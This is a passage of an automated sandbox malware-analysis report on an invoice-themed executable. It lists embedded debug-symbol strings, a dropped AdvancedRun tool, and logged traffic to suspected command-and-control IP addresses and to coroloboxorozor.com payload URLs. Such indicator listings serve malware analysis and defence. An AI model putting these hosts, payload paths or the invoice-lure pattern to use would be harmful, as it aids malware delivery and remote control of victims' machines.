        Source: Binary string: shlwapi.pdbk source: WerFault.exe, 0000001E.00000003.352878832.00000000057E2000.00000004.00000040.sdmp
        Source: Binary string: msvcp_win.pdbR source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: nsi.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: psapi.pdbX source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: powrprof.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.ni.pdbRSDS source: WERCCD7.tmp.dmp.30.dr
        Source: Binary string: ole32.pdbT source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: ole32.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: iertutil.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: msasn1.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: WWCN-Invoice-XXXXX9808-19011143287990.PDB[[ source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.460006260.00000000004F8000.00000004.00000010.sdmp
        Source: Binary string: comctl32v582.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: System.Drawing.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: combase.pdb source: WerFault.exe, 0000001E.00000003.352878832.00000000057E2000.00000004.00000040.sdmp
        Source: Binary string: iVisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.460006260.00000000004F8000.00000004.00000010.sdmp
        Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WERCCD7.tmp.dmp.30.dr
        Source: Binary string: Accessibility.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: apphelp.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: System.Xml.ni.pdbRSDS source: WERCCD7.tmp.dmp.30.dr
        Source: Binary string: System.Configuration.pdb`Q) source: WERCCD7.tmp.dmp.30.dr
        Source: Binary string: rasadhlp.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: ml.ni.pdb source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: profapi.pdb` source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: System.Core.ni.pdbRSDSD source: WERCCD7.tmp.dmp.30.dr
        Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: diasymreader.pdb_ source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: Accessibility.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: shell32.pdb, source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: rawing.pdb source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: rasman.pdbN4P0 source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: mscoreei.pdbk source: WerFault.exe, 0000001E.00000003.352878832.00000000057E2000.00000004.00000040.sdmp
        Source: Binary string: version.pdbz source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: t.VisualBasic.pdb source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: Accessibility.pdb>)^ source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: shcore.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: Accessibility.pdbT source: WERCCD7.tmp.dmp.30.dr
        Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000001E.00000003.354144153.00000000057E0000.00000004.00000040.sdmp
        Source: Binary string: System.Core.ni.pdb" source: WerFault.exe, 0000001E.00000003.353586234.0000000005698000.00000004.00000001.sdmp
        Source: Binary string: fltLib.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: shell32.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: wimm32.pdb* source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: dnsapi.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: rasapi32.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: wimm32.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: diasymreader.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: winhttp.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: dhcpcsvc6.pdb>3 source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbgl source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534358038.0000000007F80000.00000004.00000001.sdmp
        Source: Binary string: rtutils.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: System.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: HcC:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.PDB4 source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.460006260.00000000004F8000.00000004.00000010.sdmp
        Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: profapi.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe, 00000008.00000000.260198849.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000027.00000000.419368466.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.22.dr
        Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000001E.00000003.354144153.00000000057E0000.00000004.00000040.sdmp
        Source: Binary string: WLDP.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: sechost.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: System.ni.pdbRSDS source: WERCCD7.tmp.dmp.30.dr
        Source: Binary string: clrjit.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: cryptsp.pdb?9W source: WerFault.exe, 0000001E.00000003.354208449.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: wUxTheme.pdbL source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: rasman.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: propsys.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdbows source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534442041.0000000007F9F000.00000004.00000001.sdmp
        Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534442041.0000000007F9F000.00000004.00000001.sdmp
        Source: Binary string: wmswsock.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: version.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: onfiguration.pdb source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: O.pdb? source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.460006260.00000000004F8000.00000004.00000010.sdmp
        Source: Binary string: wintrust.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: powrprof.pdb| source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: oleaut32.pdbn source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: System.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: iertutil.pdbV4H0 source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001E.00000003.354144153.00000000057E0000.00000004.00000040.sdmp
        Source: Binary string: psapi.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: bcrypt.pdbv source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: System.Drawing.pdb| source: WERCCD7.tmp.dmp.30.dr
        Source: Binary string: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.PDB source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.460006260.00000000004F8000.00000004.00000010.sdmp
        Source: Binary string: cldapi.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001E.00000003.352878832.00000000057E2000.00000004.00000040.sdmp
        Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000001E.00000003.352878832.00000000057E2000.00000004.00000040.sdmp
        Source: Binary string: System.Drawing.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: System.Core.pdb source: WerFault.exe, 0000001E.00000003.353586234.0000000005698000.00000004.00000001.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: combase.pdbk source: WerFault.exe, 0000001E.00000003.352878832.00000000057E2000.00000004.00000040.sdmp
        Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 0000001E.00000003.352878832.00000000057E2000.00000004.00000040.sdmp
        Source: Binary string: wuser32.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbgl0.Y source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534358038.0000000007F80000.00000004.00000001.sdmp
        Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbqR source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534358038.0000000007F80000.00000004.00000001.sdmp
        Source: Binary string: System.Xml.pdb@ source: WERCCD7.tmp.dmp.30.dr
        Source: Binary string: System.ni.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: edputil.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: crypt32.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: global trafficTCP traffic: 192.168.2.5:49724 -> 185.192.70.170:50005
        Source: global trafficTCP traffic: 192.168.2.5:49739 -> 185.157.161.86:50005
        Source: global trafficHTTP traffic detected: GET /base/751448401274A413C5FF91CCBC4EFF60.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /base/95912DAC735F7FBEA8150232E35CAF73.html HTTP/1.1Host: coroloboxorozor.com
        Source: global trafficHTTP traffic detected: GET /base/84D1B49C9212CA5D522F0AF86A906727.html HTTP/1.1Host: coroloboxorozor.com
        Source: global trafficHTTP traffic detected: GET /base/751448401274A413C5FF91CCBC4EFF60.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /base/751448401274A413C5FF91CCBC4EFF60.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /base/95912DAC735F7FBEA8150232E35CAF73.html HTTP/1.1Host: coroloboxorozor.com
        Source: global trafficHTTP traffic detected: GET /base/84D1B49C9212CA5D522F0AF86A906727.html HTTP/1.1Host: coroloboxorozor.com
        Source: global trafficHTTP traffic detected: GET /base/95912DAC735F7FBEA8150232E35CAF73.html HTTP/1.1Host: coroloboxorozor.com
        Source: global trafficHTTP traffic detected: GET /base/95912DAC735F7FBEA8150232E35CAF73.html HTTP/1.1Host: coroloboxorozor.com
        Source: global trafficHTTP traffic detected: GET /base/95912DAC735F7FBEA8150232E35CAF73.html HTTP/1.1Host: coroloboxorozor.com
        Source: global trafficHTTP traffic detected: GET /base/84D1B49C9212CA5D522F0AF86A906727.html HTTP/1.1Host: coroloboxorozor.com
        Source: Joe Sandbox ViewIP Address: 185.157.161.86 185.157.161.86
        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: global trafficHTTP traffic detected: GET /base/751448401274A413C5FF91CCBC4EFF60.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /base/95912DAC735F7FBEA8150232E35CAF73.html HTTP/1.1Host: coroloboxorozor.com
        Source: global trafficHTTP traffic detected: GET /base/84D1B49C9212CA5D522F0AF86A906727.html HTTP/1.1Host: coroloboxorozor.com
        Source: global trafficHTTP traffic detected: GET /base/751448401274A413C5FF91CCBC4EFF60.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /base/751448401274A413C5FF91CCBC4EFF60.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /base/95912DAC735F7FBEA8150232E35CAF73.html HTTP/1.1Host: coroloboxorozor.com
        Source: global trafficHTTP traffic detected: GET /base/84D1B49C9212CA5D522F0AF86A906727.html HTTP/1.1Host: coroloboxorozor.com
        Source: global trafficHTTP traffic detected: GET /base/95912DAC735F7FBEA8150232E35CAF73.html HTTP/1.1Host: coroloboxorozor.com
        Source: global trafficHTTP traffic detected: GET /base/95912DAC735F7FBEA8150232E35CAF73.html HTTP/1.1Host: coroloboxorozor.com
        Source: global trafficHTTP traffic detected: GET /base/95912DAC735F7FBEA8150232E35CAF73.html HTTP/1.1Host: coroloboxorozor.com
        Source: global trafficHTTP traffic detected: GET /base/84D1B49C9212CA5D522F0AF86A906727.html HTTP/1.1Host: coroloboxorozor.com
        Source: unknownDNS traffic detected: queries for: coroloboxorozor.com
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.471272964.0000000002471000.00000004.00000001.sdmpString found in binary or memory: http://coroloboxorozor.com
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.471272964.0000000002471000.00000004.00000001.sdmpString found in binary or memory: http://coroloboxorozor.com/base/751448401274A413C5FF91CCBC4EFF60.html
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.471272964.0000000002471000.00000004.00000001.sdmpString found in binary or memory: http://coroloboxorozor.com/base/84D1B49C9212CA5D522F0AF86A906727.html
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.22.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.22.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.22.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.22.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.22.drString found in binary or memory: http://ocsp.sectigo.com0
        Source: WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
        Source: WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
        Source: WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
        Source: WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
        Source: WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
        Source: WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
        Source: WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.471272964.0000000002471000.00000004.00000001.sdmp, WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
        Source: WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
        Source: WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
        Source: WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
        Source: WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
        Source: WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
        Source: WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o
        Source: svchost.exe, 00000012.00000002.312067468.000001F773213000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
        Source: AdvancedRun.exe, AdvancedRun.exe, 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000027.00000000.419368466.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.22.drString found in binary or memory: http://www.nirsoft.net/
        Source: svchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
        Source: svchost.exe, 00000012.00000003.310574824.000001F77325D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
        Source: svchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
        Source: svchost.exe, 00000012.00000002.312247860.000001F77323D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
        Source: svchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
        Source: svchost.exe, 00000012.00000002.312327948.000001F77324F000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
        Source: svchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
        Source: svchost.exe, 00000012.00000002.312247860.000001F77323D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
